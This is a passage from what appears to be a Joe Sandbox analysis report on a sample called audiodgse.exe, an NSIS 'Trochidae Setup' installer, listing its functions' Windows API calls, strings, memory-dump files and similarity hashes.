Instruction ID: ec0d33f595d451752a188c19515fdbd8f87975fde9c964b970e1a5072f162152
Opcode Fuzzy Hash: 65199455fe1c80487f02215d0fef0016981626ec036ad2654a2deead1ba08cb2
Instruction Fuzzy Hash: 7D219C72C00124BBCF213FA5CD49DAE7F79EF09364B10823AF520762E0C67959419FA9

Uniqueness

Uniqueness Score: -1.00%

Function 004048B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 84stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(Trochidae Setup: Installing,Trochidae Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,004047CC,000000DF,00000000,00000400,?), ref: 0040494F
wsprintfA.USER32 ref: 00404957
SetDlgItemTextA.USER32(?,Trochidae Setup: Installing), ref: 0040496A

Strings

%u.%u%s%s, xrefs: 00404939
Trochidae Setup: Installing, xrefs: 00404941, 00404946, 0040494C, 00404960

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$Trochidae Setup: Installing
API String ID: 3540041739-3189352601
Opcode ID: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
Instruction ID: 99a67daf6c97d227f7cf07030b4f4762c36886faa54bbd44db56b2f9a5a008fd
Opcode Fuzzy Hash: 12f6fa3731befb5ff2bd286decedb689321e5faf0d4acc7877b9e8059f00797d
Instruction Fuzzy Hash: 4F110D7350812937DB00656D9C45EEF328CDF85374F254637FA25F21D1EA78DC1252A8

Uniqueness

Uniqueness Score: -1.00%

Function 00405A60 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00405FDA: lstrcpynA.KERNEL32(?,?,00000400,00403307,00422F00,NSIS Error,?,00000006,00000008,0000000A), ref: 00405FE7

Part of subcall function 00405A0B: CharNextA.USER32(?), ref: 00405A19
Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A1E
Part of subcall function 00405A0B: CharNextA.USER32(00000000), ref: 00405A32

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,T'qu,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,75712754,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00405AB3
GetFileAttributesA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,C:\Users\user\AppData\Local\Temp\nsfF9C.tmp,T'qu,?,C:\Users\user\AppData\Local\Temp\,004057C2,?,75712754,C:\Users\user\AppData\Local\Temp\), ref: 00405AC3

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405A60
T'qu, xrefs: 00405A62
C:\Users\user\AppData\Local\Temp\nsfF9C.tmp, xrefs: 00405A66, 00405A6B, 00405A71, 00405AAC, 00405AB2, 00405ABA, 00405AC2

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsfF9C.tmp$T'qu
API String ID: 3248276644-2352130648
Opcode ID: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
Instruction ID: fa13fd96d81fd76c8fc81ec80775158a1daeec84e0c55be597840f6fdc29cec0
Opcode Fuzzy Hash: 3d72b69990c89283bdec6022929649575e9d0056fbfb1b91cb3bf573b4946918
Instruction Fuzzy Hash: D5F0C825305D6616D62233361C85EAF1649CE82364715473FF851B12D3DB3C8943DE7E

Uniqueness

Uniqueness Score: -1.00%

Function 72BE1837 Relevance: 7.7, APIs: 5, Instructions: 194COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 72BE1893
GlobalFree.KERNEL32(?), ref: 72BE1A2A
GlobalFree.KERNEL32(?), ref: 72BE1A2F

Memory Dump Source

Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true

Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: 9002e532f9b6d0f2761b1edfbce8d719350108a17740c074ece90df8f1902a1d
Instruction ID: 59f7c6e7a9d2975cf38b84ac6ec6e9bbda8f58e0b60774b445be24d771baef58
Opcode Fuzzy Hash: 9002e532f9b6d0f2761b1edfbce8d719350108a17740c074ece90df8f1902a1d
Instruction Fuzzy Hash: C951E476D20154AFDB128FACC84467DBBB9EBC4345F3430DAD527A3104E3719D428761

Uniqueness

Uniqueness Score: -1.00%

Function 00401D41 Relevance: 7.6, APIs: 5, Instructions: 70windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 00401D58
GetClientRect.USER32 ref: 00401D9F
LoadImageA.USER32(?,?,?,?,?,?), ref: 00401DCD
SendMessageA.USER32 ref: 00401DDD
DeleteObject.GDI32(00000000), ref: 00401DF4

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
Instruction ID: 879b8917e8c3c9b7c2a93b5436fc05cb0971dbd0d1073f8587bede8dddcc77ec
Opcode Fuzzy Hash: 7c7b994fc4d91fb582f8b78dced405722323d32c4ba5efb8ea940f8c293222a4
Instruction Fuzzy Hash: CC2196B2E04109AFDB01DF98DD44AEE7BB5FB48300F10803AF905F6290C7789941CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00405972 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403222,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403447,?,00000006,00000008,0000000A), ref: 00405978
CharPrevA.USER32(?,00000000), ref: 00405981
lstrcatA.KERNEL32(?,00409014,?,00000006,00000008,0000000A), ref: 00405992

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405972

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-4017390910
Opcode ID: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
Instruction ID: 0da8bf888325795cdd0c5347214511d48edcf337a1f8d4df24ff951c9a6f7455
Opcode Fuzzy Hash: 76b30c2e26840082170464c0c63912d3f8204d685d5b784281808f5f32aeb92b
Instruction Fuzzy Hash: C7D0A9A2605A716AD21223199C09EDB2A0CCF02314B080063F600B22A3CA3C1D018BFE

Uniqueness

Uniqueness Score: -1.00%

Function 00402C2E Relevance: 6.1, APIs: 4, Instructions: 63registryCOMMON

Download Yara Rule

APIs

RegEnumKeyA.ADVAPI32(?,00000000,?,00000105), ref: 00402C93
RegCloseKey.ADVAPI32(?), ref: 00402C9C
RegCloseKey.ADVAPI32(?), ref: 00402CBD

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Close$Enum
String ID:
API String ID: 464197530-0
Opcode ID: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
Instruction ID: a6da729fb9552a58d385ec1c0953cf8d4b7f97d7084d0a629d1ed2eab5a533bf
Opcode Fuzzy Hash: 73c9fb611972138edc71e9406aca9b8622a65655cc86fec515c5851ee22221db
Instruction Fuzzy Hash: 8E115B32904109BBEF129F50DE09B9E7B6DEB54380F104072BE05B51E0E7B59E11AAA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405A0B Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CharNextA.USER32(?), ref: 00405A19
CharNextA.USER32(00000000), ref: 00405A1E
CharNextA.USER32(00000000), ref: 00405A32

Strings

C:\Users\user\AppData\Local\Temp\nsfF9C.tmp, xrefs: 00405A0C

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsfF9C.tmp
API String ID: 3213498283-4240112750
Opcode ID: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
Instruction ID: a4ce128402f48f1feafc2c55b1118e7c053650975221e3f5fcc16cd8d0856992
Opcode Fuzzy Hash: 41ff5f2e282a09e2b8c2dcc033aaaa44e3aa2c06707c210a0f189d2452b315e7
Instruction Fuzzy Hash: 13F0C251B04F916BFB32A2280CD4F6B5B88CB55365F145267E280672C2C27C88408F9A

Uniqueness

Uniqueness Score: -1.00%

Function 00402D60 Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32 ref: 00402D73
GetTickCount.KERNEL32(00000000,00402F3E,00000001), ref: 00402D91
CreateDialogParamA.USER32(0000006F,00000000,00402CDD,00000000), ref: 00402DAE
ShowWindow.USER32(00000000,00000005), ref: 00402DBC

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
Instruction ID: 88e2776c24fdb891b0502b3cf10dbd42b902845c03a9ebe61091678d0ea3e225
Opcode Fuzzy Hash: 840a75d409b371d7b77b67c1e1f99b2f4b28fbc1840826de4c71681516a351cc
Instruction Fuzzy Hash: E0F05E75905221ABCA207B62BE4CACA7BA4FB42B527014976F845B31E4C3784C868BDD

Uniqueness

Uniqueness Score: -1.00%

Function 00405075 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 004050A4
CallWindowProcA.USER32(?,?,?,?), ref: 004050F5

Part of subcall function 004040B4: SendMessageA.USER32 ref: 004040C6

Strings

, xrefs: 00405085

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
Instruction ID: 69794148541a1a4d8d7be296dba567d41b1ee09d4c6a2f8e6d5670bc2f98cc64
Opcode Fuzzy Hash: add97a0a6925bc22265a7304b998d918bb161013fa4103ebff122d1b57fa8f8b
Instruction Fuzzy Hash: 3F017171100649ABDF219F11DD80A9F7A65EB84314F208037FA017A2D1D77A9C51DEEA

Uniqueness

Uniqueness Score: -1.00%

Function 00405679 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24processCOMMON

Download Yara Rule

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00421510,Error launching installer), ref: 004056A2
CloseHandle.KERNEL32(?), ref: 004056AF

Strings

Error launching installer, xrefs: 0040568C

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction ID: 7ab3ce879d7da258620b5dd87dc6aa02706b67d8cc8a7f981bd8ed1ee31a9d30
Opcode Fuzzy Hash: 0a67d81f0dbc2c48957f366610cafbe47269508c26dde6c53db592e432081f5d
Instruction Fuzzy Hash: 46E046F0A00209BFEB009B60EC09F7B7AACEB10748F404861BD11F32A0E374A9108A79

Uniqueness

Uniqueness Score: -1.00%

Function 00403762 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,75712754,00000000,C:\Users\user\AppData\Local\Temp\,0040373A,00403554,?,?,00000006,00000008,0000000A), ref: 0040377C
GlobalFree.KERNEL32(002E9EC0), ref: 00403783

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403762

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-4017390910
Opcode ID: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
Instruction ID: ee514f1fc3f324b596d41214b75e1b85a5e4a54197580a2dff82031d974a72f0
Opcode Fuzzy Hash: c8d1562c69e49bacb52193c1b129ec66577e910d0a26dd744afe86c7ae1d1dec
Instruction Fuzzy Hash: 40E0C27380112097C7251F07EC04B5A776CAF45B22F01C02AEC007B3A0C7742C418BD9

Uniqueness

Uniqueness Score: -1.00%

Function 004059B9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\AppData\Roaming,00402E30,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming,C:\Users\user\AppData\Roaming\audiodgse.exe,C:\Users\user\AppData\Roaming\audiodgse.exe,80000000,00000003), ref: 004059BF
CharPrevA.USER32(80000000,00000000), ref: 004059CD

Strings

C:\Users\user\AppData\Roaming, xrefs: 004059B9

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Roaming
API String ID: 2709904686-2707566632
Opcode ID: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
Instruction ID: a086819795abd80aa1ad59fb022c9920fa60cb9da26d6d2253466900a8022463
Opcode Fuzzy Hash: 1c4ce1fe46e37373cead662465a4f3eb2a6c0bdf31f922d28b251b51ad992424
Instruction Fuzzy Hash: 3FD0A7E3408DB05EE70353149C04B9F6A48CF12310F0900A3F180A21A6C67C1C414BFE

Uniqueness

Uniqueness Score: -1.00%

Function 72BE10E0 Relevance: 5.1, APIs: 4, Instructions: 102memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 72BE115B
GlobalFree.KERNEL32(00000000), ref: 72BE11B4
GlobalFree.KERNEL32(?), ref: 72BE11C7
GlobalFree.KERNEL32(?), ref: 72BE11F5

Memory Dump Source

Source File: 00000005.00000002.1054702940.0000000072BE1000.00000020.00000001.01000000.00000006.sdmp, Offset: 72BE0000, based on PE: true

Associated: 00000005.00000002.1054694462.0000000072BE0000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054709441.0000000072BE3000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1054717890.0000000072BE5000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_72be0000_audiodgse.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: b5452da17f32653a87773a78e161d96a9c8a58e1decf0c25eb4fae15afa8722c
Instruction ID: a21d0206931dc1d88e8aff85fdf9423cd2f8ad131a62db82e66c39bbf3cdde98
Opcode Fuzzy Hash: b5452da17f32653a87773a78e161d96a9c8a58e1decf0c25eb4fae15afa8722c
Instruction Fuzzy Hash: 8C318DB2C64145DFE7218F7AD948B257FF8EB85291F3459A9E847C3151E7348C40CB15

Uniqueness

Uniqueness Score: -1.00%

Function 00405AD8 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405AE8
lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B00
CharNextA.USER32(00000000), ref: 00405B11
lstrlenA.KERNEL32(00000000,?,00000000,00405D33,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B1A

Memory Dump Source

Source File: 00000005.00000002.1051218377.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1051213262.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051222732.0000000000407000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000409000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000421000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000425000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000428000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051225983.0000000000438000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.1051260433.000000000043A000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_audiodgse.jbxd

Similarity

